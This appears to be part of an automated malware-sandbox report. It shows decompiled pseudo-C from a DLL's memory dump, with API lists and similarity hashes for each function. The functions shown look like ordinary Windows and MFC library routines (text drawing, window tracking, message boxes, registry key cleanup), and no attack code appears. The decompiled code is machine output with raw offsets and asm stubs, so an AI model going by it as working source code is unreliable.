                                                                                                        				if( *(_t99 + 8) == _t109 || _a16 == _t109) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				if(_a20 == 0xffffffff) {
                                                                                                        					_t98 = E1003EA30(_a16);
                                                                                                        					_pop(_t100);
                                                                                                        					if(_t98 >= 0x7fffffff) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_a20 = _t98;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t113 = _a8;
                                                                                                        				_v12 = _t113;
                                                                                                        				_a8 = _t109;
                                                                                                        				_t70 = GetTabbedTextExtentA( *(_t99 + 8), 0x1005c05c, 1, _t109, _t109);
                                                                                                        				_t101 = _a28;
                                                                                                        				_t71 = _t70 & 0x0000ffff;
                                                                                                        				_v16 = _t71;
                                                                                                        				if(_t101 == _t109) {
                                                                                                        					L10:
                                                                                                        					_a8 = _t71;
                                                                                                        				} else {
                                                                                                        					_t71 = 1;
                                                                                                        					if(_a24 == 1) {
                                                                                                        						_t105 =  *_t101;
                                                                                                        						_a8 = _t105;
                                                                                                        						if(_t105 == _t109) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if(_a20 != _t109) {
                                                                                                        					do {
                                                                                                        						_t110 = _a16;
                                                                                                        						_t125 = _a20;
                                                                                                        						while(1) {
                                                                                                        							_v8 = _t110;
                                                                                                        							if(_t125 == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t81 =  *_t110;
                                                                                                        							__eflags = _t81 - 9;
                                                                                                        							if(_t81 != 9) {
                                                                                                        								__eflags = _t81;
                                                                                                        								if(_t81 != 0) {
                                                                                                        									_t96 = E1003F562(_t81);
                                                                                                        									__eflags = _t96;
                                                                                                        									if(_t96 != 0) {
                                                                                                        										_t110 = _t110 + 1;
                                                                                                        										_t19 =  &_a20;
                                                                                                        										 *_t19 = _a20 - 1;
                                                                                                        										__eflags =  *_t19;
                                                                                                        									}
                                                                                                        									_t110 = _t110 + 1;
                                                                                                        									_t21 =  &_a20;
                                                                                                        									 *_t21 = _a20 - 1;
                                                                                                        									__eflags =  *_t21;
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						_t111 = _t110 - _a16;
                                                                                                        						TextOutA( *(_t99 + 4), _t113, _a12, _a16, _t111);
                                                                                                        						GetTextExtentPoint32A( *(_t99 + 8), _a16, _t111,  &_v24);
                                                                                                        						_t113 = _t113 + _v24.cx;
                                                                                                        						if(_a20 != 0) {
                                                                                                        							_t85 = _v8;
                                                                                                        							if( *_t85 != 0) {
                                                                                                        								_a20 = _a20 - 1;
                                                                                                        								_a16 = _t85 + 1;
                                                                                                        								_t87 = 0;
                                                                                                        								if(_a8 != 0) {
                                                                                                        									L30:
                                                                                                        									asm("cdq");
                                                                                                        									_t113 = ((_t113 - _a32) / _a8 + 1) * _a8 + _a32;
                                                                                                        								} else {
                                                                                                        									if(0 < _a24) {
                                                                                                        										while(1) {
                                                                                                        											_t103 = _a28;
                                                                                                        											if(_t113 <  *((intOrPtr*)(_t103 + _t87 * 4)) + _a32) {
                                                                                                        												break;
                                                                                                        											}
                                                                                                        											_t87 = _t87 + 1;
                                                                                                        											if(_t87 < _a24) {
                                                                                                        												continue;
                                                                                                        											} else {
                                                                                                        											}
                                                                                                        											L27:
                                                                                                        											_t132 = _t87 - _a24;
                                                                                                        											goto L28;
                                                                                                        										}
                                                                                                        										_t113 =  *((intOrPtr*)(_t103 + _t87 * 4)) + _a32;
                                                                                                        										__eflags = _t113;
                                                                                                        										goto L27;
                                                                                                        									}
                                                                                                        									L28:
                                                                                                        									if(_t132 == 0) {
                                                                                                        										_t94 = _v16;
                                                                                                        										_a8 = _t94;
                                                                                                        										if(_t94 != 0) {
                                                                                                        											goto L30;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L31;
                                                                                                        						}
                                                                                                        						break;
                                                                                                        						L31:
                                                                                                        					} while (_a20 != 0);
                                                                                                        					_t109 = 0;
                                                                                                        				}
                                                                                                        				_t72 =  *(_t99 + 8);
                                                                                                        				if(_t72 != _t109 && (GetTextAlign(_t72) & 0x00000001) != 0) {
                                                                                                        					GetTextMetricsA( *(_t99 + 8),  &_v80);
                                                                                                        					E1002E660(_t99, _t113 - _v80.tmOverhang - _v12);
                                                                                                        				}
                                                                                                        				_t73 = _a4;
                                                                                                        				 *_t73 = _t113 - _v12;
                                                                                                        				return _t73;
                                                                                                        			}


































                                                                                                        APIs
                                                                                                        • _strlen.LIBCMT ref: 1002E9FD
                                                                                                        • GetTabbedTextExtentA.USER32(?,1005C05C,00000001,00000000,00000000), ref: 1002EA22
                                                                                                        • TextOutA.GDI32(?,?,?,?,?), ref: 1002EA8E
                                                                                                        • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 1002EA9F
                                                                                                        • GetTextAlign.GDI32(?), ref: 1002EB1A
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002EB2B
                                                                                                          • Part of subcall function 1003F562: x_ismbbtype_l.LIBCMT ref: 1003F56C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$Extent$AlignException@8H_prolog3MetricsPoint32TabbedThrow_strlenx_ismbbtype_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3367633852-0
                                                                                                        • Opcode ID: c3bb8c9d2d4c682228e4a605d05c8c0fa66a381b67f1adb36174f4343c654057
                                                                                                        • Instruction ID: 5730b9697f6dc4124ef02e7632a94da694937c7aacf4e4627c43c9cdfa828f69
                                                                                                        • Opcode Fuzzy Hash: c3bb8c9d2d4c682228e4a605d05c8c0fa66a381b67f1adb36174f4343c654057
                                                                                                        • Instruction Fuzzy Hash: 6951663194018ADFCF01CF64E884A9E7BB9FF44391F558166FC55AB291D330AD91CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E100384B3(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				char _v12;
                                                                                                        				struct tagRECT _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				struct tagRECT _v60;
                                                                                                        				void* _t81;
                                                                                                        				int _t83;
                                                                                                        				int _t90;
                                                                                                        				intOrPtr _t92;
                                                                                                        				intOrPtr _t111;
                                                                                                        				int _t125;
                                                                                                        				void* _t134;
                                                                                                        				void* _t139;
                                                                                                        				intOrPtr _t143;
                                                                                                        				void* _t145;
                                                                                                        				void* _t149;
                                                                                                        
                                                                                                        				_t145 = __edi;
                                                                                                        				_t134 = __ecx;
                                                                                                        				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                        				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                        				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                        				_t149 = 2;
                                                                                                        				if(_t143 == 0xa) {
                                                                                                        					L7:
                                                                                                        					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
                                                                                                        					L9:
                                                                                                        					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
                                                                                                        					__eflags = _t83;
                                                                                                        					L10:
                                                                                                        					if(_t83 < 0) {
                                                                                                        						_t83 = 0;
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
                                                                                                        					_v44.left = GetSystemMetrics(0x4c);
                                                                                                        					_v44.top = GetSystemMetrics(0x4d);
                                                                                                        					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
                                                                                                        					_t90 = GetSystemMetrics(0x4f);
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					_v44.bottom = _t90 + _v44.top;
                                                                                                        					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
                                                                                                        					asm("movsd");
                                                                                                        					if(_t92 == 0xa || _t92 == 0xc) {
                                                                                                        						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
                                                                                                        						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
                                                                                                        						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                        						if(__eflags != 0) {
                                                                                                        							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
                                                                                                        							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
                                                                                                        							__eflags = _t111;
                                                                                                        							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
                                                                                                        							 *(_t134 + 0x48) = _v28.left;
                                                                                                        							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
                                                                                                        						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
                                                                                                        						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                        						_t162 = _t125;
                                                                                                        						if(_t125 != 0) {
                                                                                                        							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
                                                                                                        							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
                                                                                                        							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
                                                                                                        							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)(_t134 + 4)) = _a4;
                                                                                                        					 *((intOrPtr*)(_t134 + 8)) = _a8;
                                                                                                        					return E100382A4(_t134, _t162, 0);
                                                                                                        				}
                                                                                                        				if(_t143 == 0xb) {
                                                                                                        					__eflags = _t143 - 0xa;
                                                                                                        					if(_t143 != 0xa) {
                                                                                                        						_t14 = __ecx + 0x30;
                                                                                                        						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
                                                                                                        						__eflags =  *_t14;
                                                                                                        						goto L9;
                                                                                                        					}
                                                                                                        					goto L7;
                                                                                                        				} else {
                                                                                                        					_t149 = 0x22;
                                                                                                        					if(_t143 != 0xc) {
                                                                                                        						_t8 = __ecx + 0x34;
                                                                                                        						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
                                                                                                        						__eflags =  *_t8;
                                                                                                        					} else {
                                                                                                        						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
                                                                                                        					}
                                                                                                        					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        			}




















                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$IntersectRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1124862357-0
                                                                                                        • Opcode ID: 4ffc5c9f413903c69e2b5861111302b01c4a1b9baaf941747837db025beb87d7
                                                                                                        • Instruction ID: 060545af6b8980f94d003f59aa46a702479098f047a03de319b7069e0510e281
                                                                                                        • Opcode Fuzzy Hash: 4ffc5c9f413903c69e2b5861111302b01c4a1b9baaf941747837db025beb87d7
                                                                                                        • Instruction Fuzzy Hash: 285173B2A00209DFCB45DFA8C5C5A9E7BF5FF08314F144196E905EB20AE634EA40CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E10025045(void* __ecx, void* __edx, void* __eflags) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t37;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t57;
                                                                                                        				long _t60;
                                                                                                        				struct HWND__* _t63;
                                                                                                        				CHAR* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t67;
                                                                                                        				void* _t71;
                                                                                                        				void* _t72;
                                                                                                        				long _t73;
                                                                                                        				void* _t74;
                                                                                                        				void* _t75;
                                                                                                        				signed int _t77;
                                                                                                        				void* _t78;
                                                                                                        				signed int _t79;
                                                                                                        				void* _t81;
                                                                                                        
                                                                                                        				_t71 = __edx;
                                                                                                        				_t79 = _t81 - 0x9c;
                                                                                                        				_t37 =  *0x10072650; // 0xb5e27fef
                                                                                                        				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                        				_t73 =  *(_t79 + 0xa4);
                                                                                                        				_t77 = 0;
                                                                                                        				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                        				E10024F66(0);
                                                                                                        				_t67 = _t72;
                                                                                                        				_t63 = E10024F9A(0, _t79 - 0x70);
                                                                                                        				 *(_t79 - 0x7c) = _t63;
                                                                                                        				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                        					EnableWindow(_t63, 1);
                                                                                                        				}
                                                                                                        				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                        				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                        				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                        					L6:
                                                                                                        					__eflags = _t73;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_t77 = _t73 + 0x78;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				} else {
                                                                                                        					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                        					if(_t60 == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_t77 = _t60;
                                                                                                        						L8:
                                                                                                        						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *(_t79 - 0x74) =  *_t77;
                                                                                                        							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                        							if(_t57 != 0) {
                                                                                                        								 *_t77 = _t57 + 0x30000;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                        							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                        							if(_t54 <= 1) {
                                                                                                        								_t24 = _t79 + 0xac;
                                                                                                        								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                        								__eflags =  *_t24;
                                                                                                        							} else {
                                                                                                        								if(_t54 + 0xfffffffd <= 1) {
                                                                                                        									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t96 = _t73;
                                                                                                        						 *(_t79 - 0x6c) = 0;
                                                                                                        						if(_t73 == 0) {
                                                                                                        							_t64 = _t79 - 0x6c;
                                                                                                        							_t73 = 0x104;
                                                                                                        							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t64 =  *(_t73 + 0x50);
                                                                                                        						}
                                                                                                        						_push( *(_t79 + 0xac));
                                                                                                        						_push(_t64);
                                                                                                        						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                        						_push( *(_t79 - 0x7c));
                                                                                                        						_t74 = E1000CED0(_t64, _t67, _t73, _t77, _t96);
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *_t77 =  *(_t79 - 0x74);
                                                                                                        						}
                                                                                                        						if( *(_t79 - 0x70) != 0) {
                                                                                                        							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                        						}
                                                                                                        						E10024F66(1);
                                                                                                        						_pop(_t75);
                                                                                                        						_pop(_t78);
                                                                                                        						_pop(_t65);
                                                                                                        						return E10039F21(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

























                                                                                                        APIs
                                                                                                          • Part of subcall function 10024F9A: GetParent.USER32(?), ref: 10024FED
                                                                                                          • Part of subcall function 10024F9A: GetLastActivePopup.USER32(?), ref: 10024FFC
                                                                                                          • Part of subcall function 10024F9A: IsWindowEnabled.USER32(?), ref: 10025011
                                                                                                          • Part of subcall function 10024F9A: EnableWindow.USER32(?,00000000), ref: 10025024
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 10025092
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 100250A0
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 100250AA
                                                                                                        • SendMessageA.USER32 ref: 100250BF
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1002513C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 10025178
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1877664794-0
                                                                                                        • Opcode ID: edc0b81291e7e2a2d36287fec3483512f230cc3b3d1996ba9c1104766374c41e
                                                                                                        • Instruction ID: 4c829c5644aa77a9a1823c96e9ef9ea07201a3d85bc19dbd2844f63f03839321
                                                                                                        • Opcode Fuzzy Hash: edc0b81291e7e2a2d36287fec3483512f230cc3b3d1996ba9c1104766374c41e
                                                                                                        • Instruction Fuzzy Hash: 1B418D32A003589FEB30CFB4DC85B9D77B8EF05752F610119E95AEB282E77299448B54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E100387B4(void* __ecx, intOrPtr __edx) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				struct tagMSG _v32;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t30;
                                                                                                        				void* _t32;
                                                                                                        				void* _t34;
                                                                                                        				void* _t36;
                                                                                                        				intOrPtr* _t37;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr _t53;
                                                                                                        				void* _t54;
                                                                                                        				void* _t56;
                                                                                                        				void* _t57;
                                                                                                        				void* _t58;
                                                                                                        				intOrPtr* _t59;
                                                                                                        
                                                                                                        				_t55 = __edx;
                                                                                                        				_t51 = __ecx;
                                                                                                        				_t56 = GetCapture;
                                                                                                        				_t57 = __ecx;
                                                                                                        				if(GetCapture() != 0) {
                                                                                                        					L20:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				E1000E5E5(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
                                                                                                        				if(E1000E5E5(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                        					L19:
                                                                                                        					E10038627(0, _t57, _t69);
                                                                                                        					goto L20;
                                                                                                        				} else {
                                                                                                        					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                                        						_t30 = _v32.message - 0x100;
                                                                                                        						if(_t30 == 0) {
                                                                                                        							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                        							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
                                                                                                        								_t51 = _t57;
                                                                                                        								E1003847F(_t57, _v32.wParam, 1);
                                                                                                        							}
                                                                                                        							__eflags = _v32.wParam - 0x1b;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								L18:
                                                                                                        								_t32 = E1000E5E5(0, _t51, _t58, GetCapture());
                                                                                                        								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
                                                                                                        								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L19;
                                                                                                        						}
                                                                                                        						_t34 = _t30 - 1;
                                                                                                        						if(_t34 == 0) {
                                                                                                        							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                        							if(__eflags != 0) {
                                                                                                        								_t51 = _t57;
                                                                                                        								E1003847F(_t57, _v32.wParam, 0);
                                                                                                        							}
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t36 = _t34 - 0xff;
                                                                                                        						if(_t36 == 0) {
                                                                                                        							_t53 = _v32.pt;
                                                                                                        							_t55 = _v8;
                                                                                                        							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                        							_push(_t53);
                                                                                                        							_push(_t53);
                                                                                                        							_t37 = _t59;
                                                                                                        							 *_t37 = _t53;
                                                                                                        							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                                                        							_t51 = _t57;
                                                                                                        							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
                                                                                                        								E100384B3(_t51, _t56);
                                                                                                        							} else {
                                                                                                        								E10038403(_t51);
                                                                                                        							}
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t41 = _t36;
                                                                                                        						if(_t41 == 0) {
                                                                                                        							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                        							_t54 = _t57;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								E10038770(0, _t58, __eflags);
                                                                                                        							} else {
                                                                                                        								E1003866C(_t54, _t55, _t56, _t57, __eflags);
                                                                                                        							}
                                                                                                        							return 1;
                                                                                                        						}
                                                                                                        						if(_t41 == 0) {
                                                                                                        							goto L19;
                                                                                                        						}
                                                                                                        						DispatchMessageA( &_v32);
                                                                                                        						goto L18;
                                                                                                        					}
                                                                                                        					_push(_v32.wParam);
                                                                                                        					E10026933();
                                                                                                        					goto L19;
                                                                                                        				}
                                                                                                        			}






















                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Capture$Message$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 3654672037-0
                                                                                                        • Opcode ID: 2d2c053ebe6b21ddf56576f2fd9228eb340c24e045ae9b92debe497d1aea0dc8
                                                                                                        • Instruction ID: 58140d2015faf17e2d99ab4fe7c885034bb6094fb7cc9d520a4d421e703158fb
                                                                                                        • Opcode Fuzzy Hash: 2d2c053ebe6b21ddf56576f2fd9228eb340c24e045ae9b92debe497d1aea0dc8
                                                                                                        • Instruction Fuzzy Hash: AB310374900745DFDB67EBA48C8596E77E9EB80383F9008AAF551EA110DE30AF40C761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 74%
                                                                                                        			E10035A58(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v272;
                                                                                                        				void* _v276;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t8;
                                                                                                        				char* _t14;
                                                                                                        				void* _t24;
                                                                                                        				int _t25;
                                                                                                        				void* _t34;
                                                                                                        				char* _t35;
                                                                                                        				void* _t36;
                                                                                                        				signed int _t38;
                                                                                                        
                                                                                                        				_t34 = __edx;
                                                                                                        				_t8 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t8 ^ _t38;
                                                                                                        				_t35 = E1003F40E(_a4);
                                                                                                        				if(_t35 != 0) {
                                                                                                        					_t14 =  &(_t35[lstrlenA(_t35)]);
                                                                                                        					if(_t14 != 0) {
                                                                                                        						_push(_t36);
                                                                                                        						_push(_t24);
                                                                                                        						while(1) {
                                                                                                        							 *_t14 = 0;
                                                                                                        							E1003F60C(_t35, _t14);
                                                                                                        							if(RegOpenKeyA(0x80000000, _t35,  &_v276) != 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t25 = 0;
                                                                                                        							if(RegEnumKeyA(_v276, 0,  &_v272, 0x105) == 0) {
                                                                                                        								_t25 = 1;
                                                                                                        							}
                                                                                                        							RegCloseKey(_v276);
                                                                                                        							if(_t25 == 0) {
                                                                                                        								RegDeleteKeyA(0x80000000, _t35);
                                                                                                        								_t14 = E10040566(_t35, 0x5c);
                                                                                                        								_t46 = _t14;
                                                                                                        								if(_t14 != 0) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						_pop(_t24);
                                                                                                        						_pop(_t36);
                                                                                                        					}
                                                                                                        					_push(_t35);
                                                                                                        					E10039F30(_t24, _t35, _t36, _t46);
                                                                                                        				}
                                                                                                        				return E10039F21(1, _t24, _v8 ^ _t38, _t34, _t35, _t36);
                                                                                                        			}



















                                                                                                        APIs
                                                                                                        • __strdup.LIBCMT ref: 10035A70
                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10035A81
                                                                                                          • Part of subcall function 1003F60C: __mbsdec_l.LIBCMT ref: 1003F616
                                                                                                        • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10035AA7
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10035AC6
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035AD7
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10035AE3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
